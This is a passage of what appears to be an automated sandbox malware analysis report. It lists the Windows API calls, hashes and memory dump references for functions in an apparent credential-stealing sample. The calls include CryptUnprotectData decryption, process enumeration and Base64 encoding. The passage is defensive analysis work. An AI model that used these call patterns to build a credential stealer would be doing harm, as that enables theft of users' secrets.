                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: ec81ffedde83592828158ffa631c2a00f0b79193adfc365bd1663ff426e63cad
                          • Instruction ID: 56cb7a769ab8add267ccd19e82fb858ac71ccae3f1e2b2a7cebf29b517075736
                          • Opcode Fuzzy Hash: ec81ffedde83592828158ffa631c2a00f0b79193adfc365bd1663ff426e63cad
                          • Instruction Fuzzy Hash: F7413DB590421E9BDB10CFA4ED89FFEB7B8BB48744F1041B8E609A6280D7745A84CF95
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000272AD
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000272B4
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000272E1
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00027304
                          • LocalFree.KERNEL32(?), ref: 0002730E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 52a9c04c78da5e72f428f636d3d56a6ddc36550e588ae517fb9f125f7cf4d19a
                          • Instruction ID: bc7e2a7e035ae2c4869779bfb8923e2ad2a4f938246264727f76d216d8f374df
                          • Opcode Fuzzy Hash: 52a9c04c78da5e72f428f636d3d56a6ddc36550e588ae517fb9f125f7cf4d19a
                          • Instruction Fuzzy Hash: DA011275A44308BBEB10DFE8DC49FAE7778AB44B14F104554FB09BB2C0D6B0AA00DB54
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000397AE
                          • Process32First.KERNEL32(00040ACE,00000128), ref: 000397C2
                          • Process32Next.KERNEL32(00040ACE,00000128), ref: 000397D7
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 000397EC
                          • CloseHandle.KERNEL32(00040ACE), ref: 0003980A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: b373053c3a9868bce42b7fcab36a7d25fac29e0d2c38798e1f3d78b5cfa18456
                          • Instruction ID: 08270e980226660f56a64c4c7ae8ec326462ffb36c07b524da7429bb5bdf888b
                          • Opcode Fuzzy Hash: b373053c3a9868bce42b7fcab36a7d25fac29e0d2c38798e1f3d78b5cfa18456
                          • Instruction Fuzzy Hash: 9F011A75A14208EBDB21DFA4DD48BEEBBFCBB48750F104599E909A7240EB709B44CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <7\h$huzx
                          • API String ID: 0-2989614873
                          • Opcode ID: b476232773c0b84fd7ace852f2944d6f802ee3a4ac3ad52e92f5f897fea019ca
                          • Instruction ID: 2ae7264ab28677e4edf84d6a1abd5430226acd94c1ee3e8aa092b54ffa707a74
                          • Opcode Fuzzy Hash: b476232773c0b84fd7ace852f2944d6f802ee3a4ac3ad52e92f5f897fea019ca
                          • Instruction Fuzzy Hash: 746343B241EBD41FC727CB304BB62517F66BB1361131949EEC4C18F4B3C694AA1AE35A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @Ux3$K#q,$V5m$}B{Z
                          • API String ID: 0-234529196
                          • Opcode ID: 01c37b8b140cfaf85a6b08be137244c5855052560f8bc2fd321ab2e869444daa
                          • Instruction ID: 4014fbc6bc72678f8eb20e371ba350a1672bed265f402ce28bdb860cf6049784
                          • Opcode Fuzzy Hash: 01c37b8b140cfaf85a6b08be137244c5855052560f8bc2fd321ab2e869444daa
                          • Instruction Fuzzy Hash: 75A2E6F3A0C6009FE304AE2DEC8567ABBE5EF94720F16893DE6C4C7744EA3558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )to$01V>$7,_p$}~
                          • API String ID: 0-1835218659
                          • Opcode ID: c35abc2bc68454431e90e83a356eb63dcf1639783d6b9b3e2989b0365ea602e7
                          • Instruction ID: 54f545526d7d30ca6381a0dab80cefb1cd0acc0395a18b55522dbd325bb515e6
                          • Opcode Fuzzy Hash: c35abc2bc68454431e90e83a356eb63dcf1639783d6b9b3e2989b0365ea602e7
                          • Instruction Fuzzy Hash: D1823BF3A082049FE3046E2DEC4567AFBE9EF94720F1A4A3DE6C5C3744EA3598058657
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,000251D4,40000001,00000000,00000000,?,000251D4), ref: 00039050
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: dcf60531f810c16885ad12ff37f33048ff4b6310a04e40b16a1ed434ef9c1eb8
                          • Instruction ID: 1203a94ba4a3e54e33ec064f4d79c7afa918963d79c61ef14f40a0c6820c140e
                          • Opcode Fuzzy Hash: dcf60531f810c16885ad12ff37f33048ff4b6310a04e40b16a1ed434ef9c1eb8
                          • Instruction Fuzzy Hash: 04110674204209FFDF09CF54D884FAA33ADAF89350F108458FA198B250DBB1E941CBA4
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A23F
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00024F3E,00000000,?), ref: 0002A251
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A27A
                          • LocalFree.KERNEL32(?,?,?,?,00024F3E,00000000,?), ref: 0002A28F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 13f17d6986e41dd68d1bbe29cbfc91bfb2ee6d536a824001e65bc110195d2d89
                          • Instruction ID: 1223fea7c29cfd096f193199b83de709090be6f25ae55b8edd063eda5474fc9f
                          • Opcode Fuzzy Hash: 13f17d6986e41dd68d1bbe29cbfc91bfb2ee6d536a824001e65bc110195d2d89
                          • Instruction Fuzzy Hash: 9411A474640309EFEB11CF64DC95FAA77B5EB89B14F208458FD159B390C772A941CB50
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00040DE8,00000000,?), ref: 00037B40
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037B47
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00040DE8,00000000,?), ref: 00037B54
                          • wsprintfA.USER32 ref: 00037B83
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 02befa734cbf787d0e2f9a201b2ac5a3b77765ea7c0f21c326b2e0a402a1f2b3
                          • Instruction ID: 00c4e1536f6b3351a2bd3c6322b7f756df50fc4ff957abf7302d5e4e40addf39
                          • Opcode Fuzzy Hash: 02befa734cbf787d0e2f9a201b2ac5a3b77765ea7c0f21c326b2e0a402a1f2b3
                          • Instruction Fuzzy Hash: D6112AB2908118ABCB14DBC9ED49BBEB7B8EB4CB61F10411AF605A2280D7395940C7B0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FDE368,00000000,?,00040DF8,00000000,?,00000000,00000000), ref: 00037BF3
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037BFA
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FDE368,00000000,?,00040DF8,00000000,?,00000000,00000000,?), ref: 00037C0D
                          • wsprintfA.USER32 ref: 00037C47
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 92423b93235df26a7b9b43b0a8cf3d59351307c9012e4e16769e7d24e7e3e686
                          • Instruction ID: 0f50b91d1edcf6814f9a5517eeccd6c4a7bd89eab0b30b466fdec0b5f936c22f
                          • Opcode Fuzzy Hash: 92423b93235df26a7b9b43b0a8cf3d59351307c9012e4e16769e7d24e7e3e686
                          • Instruction Fuzzy Hash: C411A5B1909218DFDB209B54DC49FA9B778FB44761F1003E9FA19972D0D7741940CF51
                          APIs
                          • CoCreateInstance.COMBASE(0003E120,00000000,00000001,0003E110,00000000), ref: 000339A8
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00033A00
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: 83b868da8b0c1a15cc00d52b279339a6de7468e3638883fbab5bdc44b174a38a
                          • Instruction ID: 24c0acfed0bd2499bef1d561686bb493afc67826cc0278e1ded8ae67a6be1dad
                          • Opcode Fuzzy Hash: 83b868da8b0c1a15cc00d52b279339a6de7468e3638883fbab5bdc44b174a38a
                          • Instruction Fuzzy Hash: 2741D870A40A189FDB24DB54CC95B9BB7B9AB48702F4041D8E608EB2D0D7B16E85CF50
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0002A2D4
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 0002A2F3
                          • LocalFree.KERNEL32(?), ref: 0002A323
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: f3f1f757d3d5fbf33c3bcdb79d3eccf96ccc471e2e86cb0410ebeb7ab5ccbc5a
                          • Instruction ID: af3e97e78f4ede0e84d3b848d9a2da4ca67356aa1a1186dd7a6e7b69f622f9f4
                          • Opcode Fuzzy Hash: f3f1f757d3d5fbf33c3bcdb79d3eccf96ccc471e2e86cb0410ebeb7ab5ccbc5a
                          • Instruction Fuzzy Hash: 5211A8B4A00209EFDB04DFA8D989AAEB7B5FB89700F108569FD1597350D770AE50CB61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
